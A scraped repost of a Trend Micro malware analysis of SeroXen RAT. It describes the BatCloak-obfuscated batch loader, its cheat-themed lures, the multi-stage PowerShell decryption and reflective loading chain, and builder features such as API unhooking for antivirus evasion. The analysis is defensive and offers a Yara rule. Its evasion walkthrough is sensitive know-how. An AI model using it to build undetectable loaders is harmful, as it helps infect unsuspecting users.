SeroXen Incorporates Latest BatCloak Engine Iteration<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration.html\"><br \/>\n<meta property=\"og:title\" content=\"SeroXen Incorporates Latest BatCloak Engine Iteration\"><br \/>\n<meta property=\"og:description\" content=\"We looked into the documented behavior of SeroXen malware and noted the inclusion of the latest iteration of the batch obfuscation engine BatCloak to generate a fully undetectable (FUD) .bat loader. This is the second part of a three-part series documenting the abuse of BatCloak\u2019s evasion capabilities and interoperability with other malware.\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"SeroXen Incorporates Latest BatCloak Engine Iteration\"><br \/>\n<meta name=\"twitter:description\" content=\"We looked into the documented behavior of SeroXen malware and noted the inclusion of the latest iteration of the batch obfuscation engine BatCloak to generate a fully undetectable (FUD) .bat loader. This is the second part of a three-part series documenting the abuse of BatCloak\u2019s evasion capabilities and interoperability with other malware.\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.334519572954\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layer *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"787397878\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"9.3296812749004\">\n<div class=\"article-details\" role=\"heading\" readability=\"38.300796812749\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Malware<\/p>\n<p class=\"article-details__description\">We looked into the documented behavior of SeroXen malware and noted the inclusion of the latest iteration of the batch obfuscation engine BatCloak to generate a fully undetectable (FUD) .bat loader. This is the second part of a three-part series documenting the abuse of BatCloak\u2019s evasion capabilities and interoperability with other malware.<\/p>\n<p class=\"article-details__author-by\">By: Peter Girnus, Aliakbar Zahravi <time class=\"article-details__date\">June 15, 2023<\/time> <span>Read time: <\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"45.719396310788\">\n<div readability=\"39.051984348798\">\n<p>The recent rise of highly sophisticated malware\u2019s ability to evade detection through fully undetectable (FUD) capabilities, low-cost financial accessibility, and minimal skill barriers have created a pervasive threat targeting online communities and organizations. One particular malware known as SeroXen has deployed an advanced, fully undetectable (FUD) technique via highly obfuscated batch files to infect victims with hVNC-(Hidden Virtual Network Computing) capable malware.<\/p>\n<p>This entry is the second installment of a three-part series featuring BatCloak engine, its iterations, and inclusion in SeroXen malware as the main loading mechanism. The first entry, titled \u201c<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/f\/analyzing-the-fud-malware-obfuscation-engine-batcloak.html\">The Dark Evolution: Advanced Malicious Actors Unveil Malware Modification Progression<\/a>,\u201d looked into the beginnings and evolution of the BatCloak obfuscation engine. The third part of this series analyzes the distribution mechanism of SeroXen and BatCloak, including the security impact and insights of FUD batch obfuscation. As of this writing, a quick online search for SeroXen will show top results for an official website and social media and sharing pages with videos on how to use the remote access trojan (RAT) as if it were a legitimate tool. We will go over these dissemination strategies in the subsequent entry.<\/p>\n<p><span class=\"main-subtitle-black\"><span class=\"body-subhead-title\">SeroXen\u2019s FUD batch patterns<\/span><\/span><\/p>\n<p>To attain FUD status, the obfuscation patterns employed in SeroXen have shown multilayered tiers in its evolution, evolving from notable predecessors such as Jlaive, BatCloak, CryBat, Exe2Bat, and ScrubCrypt. Notably, the author of these FUD tools is acknowledged as a contributor in various instances, including attributions present on the main SeroXen website and forum posts authored by the individual behind SeroXen.<\/p>\n<p><span class=\"body-subhead-title\">Examining the SeroXen infection chain<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure1-seroxen-incorporates-latest-batcloak-engine-iteration-infection-chain.jpg\" alt=\"fig1-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 1. SeroXen infection chain<\/figcaption><\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"40.5\">\n<div readability=\"26\">\n<p>To successfully initiate the infection process, the targeted user is lured into executing a batch file. These lures are often presented as software-specific to enthusiast groups such as gaming communities. The infection process’ efficiency is enhanced because of the batch file\u2019s FUD capability.<\/p>\n<p>We found a compilation of compromised archives associated with cheats pertaining to prominent game titles. Each of these archives harbors a highly obfuscated batch file that serves as the infection vector initiating a SeroXen infection. Alarmingly, none of the archives exhibited any form of security solution detection. In most instances, these malicious archives are hosted on the Discord CDN (content delivery network) catering to specific interested communities, but they could also be hosted on any number of cloud storage options as well as special interest forums.<\/p>\n<p>Taking a visual representation of a SeroXen sample submitted to a public repository under the false pretense of being a popular online video game cheat, the sample showcases the comprehensive concealment capabilities inherent. Through investigative analysis, we found a consistent pattern in the dimensions of SeroXen\u2019s obfuscated batch files, which commonly exhibit sizes ranging from approximately 10MB to 15MB.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure2-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig2-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 2. Gaming lures with no detections<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p><b>Analyzing the obfuscation patterns deployed by SeroXen<\/b><\/p>\n<p>To develop a comprehensive understanding of the obfuscation algorithm utilized within SeroXen, we conducted an in-depth examination on a multitude of heavily obfuscated batch files. The figure sample exhibits an obfuscated SeroXen batch payload camouflaged under the guise of a Fortnite hack.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure3-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig3-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 3. SeroXen obfuscated batch payload<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"39.5\">\n<div readability=\"24\">\n<p>The batch obfuscation patterns implemented by the SeroXen FUD algorithm can be summarized as follows:<\/p>\n<ol>\n<li>Suppression of console output through the inclusion of the directive “@echo off”<\/li>\n<li>Utilization of sophisticated string manipulation techniques to obfuscate the initial “set” command<\/li>\n<li>Assignment of the “set” command to a user-defined variable<\/li>\n<li>Assignment of equal operations (“=”) to a user-defined variable<\/li>\n<li>Utilization of steps 3 and 4 to assign values to the additional user-defined variables<\/li>\n<li>Concatenation of variables at the conclusion of the obfuscation process to construct a command, which is subsequently executed<\/li>\n<\/ol>\n<p>Furthermore, our investigation showed that the implementation of layered obfuscation techniques alongside the incorporation of superfluous code fragments or “junk code” were employed to impede the analysis of the batch file hindering detections.<\/p>\n<p><b>Summary of commands executed during the SeroXen infection process<\/b><\/p>\n<p>We break down the core commands concatenated and executed in order to infect the victim as follows:<\/p>\n<ol>\n<li>Ensure all batch commands run are suppressed with \u201c@echo off\u201d<\/li>\n<li>Copy the PowerShell executable from <i>System32<\/i> to the current directory<\/li>\n<li>Set the current directory<\/li>\n<li>Name this copied PowerShell after the batch filename with an appended .exe, such as <i><mal_bat>.exe<\/i><\/li>\n<li>Use the PowerShell command to decrypt and execute the encrypted payload<\/li>\n<li>Build the final PowerShell command used to decrypt the final payload<\/li>\n<li>Use the static operator to decrypt the final payload<\/li>\n<\/ol>\n<p><b>Analyzing the deobfuscated SeroXen batch files<\/b><\/p>\n<p>During our technical analysis of FUD-enabled SeroXen batch payloads, we were able to deobfuscate the commands associated with its execution and patch key points in its operation to dump the deobfuscated version.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure4-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig4-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 4. Deobfuscated SeroXen batch payload<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>If we compare the deobfuscated sample presented with the highly obfuscated sample (Figure 3), we can demonstrate the core function of the batch script: to generate a series of set commands in an obfuscated manner to evade detection. We see the result of the numerous obfuscated set commands in its deobfuscated equivalent. Throughout the obfuscated batch file, numerous variables are concatenated together to be executed.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure5-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig5-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 5. Deobfuscated SeroXen PowerShell commands<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p><b>Analyzing the final PowerShell decryption command<\/b><\/p>\n<p>The PowerShell command to be executed in the FUD obfuscated batch file is a series of hidden PowerShell commands used to decrypt and deliver the .Net loader.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure6-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig6-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 6 . Final PowerShell command executed in the SeroXen batch file<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.17681498829\">\n<div readability=\"18.577283372365\">\n<p>The deobfuscated sequence of PowerShell commands decrypt the payload and employ an <a href=\"https:\/\/attack.mitre.org\/techniques\/T1620\/\">assembly reflection<\/a> mechanism to reflectively load it. The essential characteristics of the final sequence of PowerShell commands include:<\/p>\n<ol>\n<li>Decode payload using Base64<\/li>\n<li>Decrypt payload using AES OR XOR algorithm. In the case of AES:\n<ul>\n<li><span class=\"rte-red-bullet\"><\/span>Instantiate an AES decryption object with the cipher block chaining (CBC) mode<\/li>\n<li><span class=\"rte-red-bullet\">Use a Base64 blob for the key and IV<\/span><\/li>\n<\/ul>\n<\/li>\n<li>Unzip the payload<\/li>\n<li>Reflectively load the payload<\/li>\n<\/ol>\n<p>From the next figure, we demonstrate how the C# loader is decrypted from the deobfuscated batch files, after which we unzip the decrypted archive to drop the .Net binary.<\/p>\n<p>We decoded the payload using Base64, which is then AES-decrypted using the deobfuscated Key and IV and finally gunzipped to reveal the .Net loader. This payload is then loaded into memory using reflection.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure7-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig7-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 7. Using Python to decrypt the .Net loader<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><span class=\"body-subhead-title\">Deep dive into SeroXen builder<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure8-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig8-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 8. Obfuscated builder<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.08488372093\">\n<div readability=\"11.13488372093\">\n<p>The SeroXen builder binary file is protected by the Agile .NET. After unpacking the functions and builder resources, this section shows that SeroXen is a modified version of <a href=\"https:\/\/github.com\/quasar\/Quasar\">Quasar RAT<\/a> with a rootkit and other modifications, such as adopting the loader builder Jlaive and BatCloak obfuscation engine to generate a FUD .bat loader. The evolution and technical analysis of Jlaive and BatCloak was discussed in <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/f\/analyzing-the-fud-malware-obfuscation-engine-batcloak.html\">part 1 of this series<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure9-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig9-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 9 . Unpacked builder resources (left) and builder function names (right) a modified version of Quasar RAT in its arsenal<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure10-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig10-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 10. SeroXen builder adopting Jlaive and BatCloak source codes<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>As of this writing, SeroXen offers monthly and lifetime key options for purchase online, as well as instructions for using the RAT. We go over this in detail in the third installment of this series as part of the cybercriminals\u2019 distribution strategies.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure11-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig11-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 11. SeroXen builder usage instruction<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p><span class=\"body-subhead-title\">SeroXen payload generation process<\/span><\/p>\n<p>Upon pressing the \u201cbuild\u201d button, the builder writes the user-given configuration to the pre-compiled file called \u201c<i>client.bin<\/i>,\u201d and this produces the Quasar RAT payload and passes it to a function called \u201c<i>Crypt<\/i>.\u201d <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure12-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig12-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 12. SeroXen vs Quasar RAT payload generation<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The Crypt function employs the Jlaive crypter multi-stage loader generator and BatCloack obfuscator source code to produce undetectable loaders. This function first reads the Quasar RAT payload content and verifies if it is a valid .NET assembly. Crypt then patches some string and opcode within the binary and encrypts it using the AES algorithm with CBC cipher mode, and saves it as \u201c<i>payload.exe<\/i>.\u201d <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure13-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig13-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 13. Payload encryption and obfuscation process<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>Much like a Jlaive crypter, the builder takes in user configuration and produces the first loader. This is achieved using a C# template file, “<i>Quasar.Server.Stub.cs<\/i>,” found embedded within its resources. The author has integrated an extra functionality in this adapted version of the Jlaive CreateCS function such as API unhooking.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure14-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig14-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 14. Create C# loader<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.232854864434\">\n<div readability=\"18.606060606061\">\n<p><i>Apiunhooker.dll<\/i> is an open-source project called \u201c<a href=\"https:\/\/github.com\/GetRektBoy724\/SharpUnhooker\">SharpUnhooker<\/a>,\u201d which is a C#-based universal API unhooker that automatically Unhooks API Hives (i.e., <i>ntdll.dll<\/i>, <i>kernel32.dll<\/i>, <i>advapi32.dll<\/i>, and <i>kernelbase.dll<\/i>). This technique is used to attempt evading user-land monitoring done by antivirus technologies and\/or endpoint detection and response (EDR) solutions by cleansing or refreshing API DLLs that loaded during the process.<\/p>\n<p>The builder subsequently compiles the C# loader stub, adding necessary files and dependencies such as encrypted Quasart RAT (<i>payload.exe<\/i>) and SharpUnhooker (<i>Apiunhooker.dll<\/i>) to its resources. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure15-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig15-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 15. C# loader compilation<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"40.5\">\n<div readability=\"26\">\n<p>Next, the builder compresses the C# loader, encrypts it using AES\/XOR (depending on the configuration), and encodes it in Base64. Finally, it creates a batch file and includes the encoded C# loader binary into it. It also manages the compression, decoding, and decryption processes using an obfuscated PowerShell script, which is also appended to the batch file.<\/p>\n<p>The batch file’s role is to deobfuscate the PowerShell script and execute it. This PowerShell script scans the content of the batch file for the value following “<i>::<\/i>“, extracts this value, decodes it, decompresses it, decrypts it, and finally executes it in memory.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure16-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig16-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 16. Creating and writing encrypted data to a batch file, and deleting temporary files<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure17-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig17-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 17. Generating an obfuscated batch loader (top) and PowerShell loader (bottom)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>Two PowerShell templates, “<i>Qusar.Server.AESStub.ps1<\/i>” and “<i>Quasar.Server.XORStub.ps1<\/i>,” exist in the resource section of the builder. Depending on the configuration, one of these will be loaded and utilized.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure18-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig18-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 18. PowerShell stub<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"48.14437034131\">\n<div readability=\"45.366810513927\">\n<p><span class=\"body-subhead-title\">Conclusion<\/span><\/p>\n<p>In this entry, we include a <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/Yara-rule-seroxen-incorporates-latest-batcloak-engine-iteration.txt\">Yara rule<\/a> that organizations and security teams can use to detect SeroXen obfuscated batch files. Additionally, here\u2019s a <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/PS-script-seroxen-incorporates-latest-batcloak-engine-iteration.txt\">PowerShell script<\/a> that can reveal the final deobfuscated batch file and commands to be run.<i> <b>It is critically important that this PowerShell script be run in an isolated malware sandbox.<\/b> <\/i>This script can be used to deobfuscate the SeroXen batch file where security teams can inspect its output file for the PowerShell command to be executed in the deobfuscation routine. By inspecting this deobfuscated payload, the analyst can grab the Key and IV from the PowerShell command to decrypt the final payload.<\/p>\n<p>Overall, SeroXen is a full-feature remote administration tool (RAT) coded in C# and built using a combination of various open-source projects that work together to generate a FUD payload. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/stealthy-seroxen-rat-malware-increasingly-used-to-target-gamers\/\">Reports<\/a> <a href=\"https:\/\/cybersecurity.att.com\/blogs\/labs-research\/seroxen-rat-for-sale\">have<\/a> <a href=\"https:\/\/www.hackread.com\/windows-users-beware-seroxen-rat-hit-gamers\/\">emerged<\/a> of SeroXen being abused for several infections and attacks. We foresee the evolved BatCloak engine at the core of SeroXen\u2019s FUD capabilities as the BatCloak obfuscation engine continues to evolve and be used as a FUD tool for future malware attacks.<\/p>\n<p>Individuals are strongly advised to adopt a skeptical stance when encountering links and software packages associated with terms such as “cheats,” “hacks,” “cracks,” and other pieces of software related to gaining a competitive edge. Users, developers, gamers, and enthusiasts are also advised to exercise caution when executing batch files obtained from the internet. Additionally, organizations are encouraged to stay vigilant against phishing attacks that might attempt to entice users to download and run batch installers (e.g., scripting and automation of repetitive tasks).<\/p>\n<p>Organizations should consider employing a cutting edge <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/endpoint.html\">multilayered defensive strategy<\/a> and comprehensive security solutions, such as <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response\/xdr.html\">Trend Micro\u2122 XDR<\/a>, that can detect, scan, and block malicious content such as SeroXen and BatCloak across the modern threat landscape. An extended detection and response capability across endpoint, servers, workloads, email, network, cloud, and identity observed from a single platform like <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/security-operations.html\">Trend Vision One\u2122\ufe0f<\/a> can mitigate these risks by considering adversarial tactics, techniques, and procedures (TTPs) to profile the entirety of a routine. Learn more about how the <a href=\"https:\/\/www.zerodayinitiative.com\/about\/\">Zero Day Initiative (ZDI)<\/a> bug bounty program rewards researchers for responsible vulnerability disclosure as well as protects organizations globally and stay up to date on the latest <a href=\"https:\/\/www.zerodayinitiative.com\/blog?tag=Security+Patch\">news regarding mission critical security patches<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p> <!--For Modal-end--> <!-- Go to www.addthis.com\/dashboard to customize your tools --> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We looked into the documented behavior of SeroXen malware and noted the inclusion of the latest iteration of the batch obfuscation engine BatCloak to generate a fully undetectable (FUD) .bat loader. This is the second part of a three-part series documenting the abuse of BatCloak\u2019s evasion capabilities and interoperability with other malware. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":52353,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9546,9510,9511,9508,9514,9513,9577,9536,9585],"class_list":["post-52352","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-apttargeted-attacks","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-endpoints","tag-trend-micro-research-iot","tag-trend-micro-research-malware","tag-trend-micro-research-phishing","tag-trend-micro-research-privacyrisks","tag-trend-micro-research-spam"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-06-15T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" 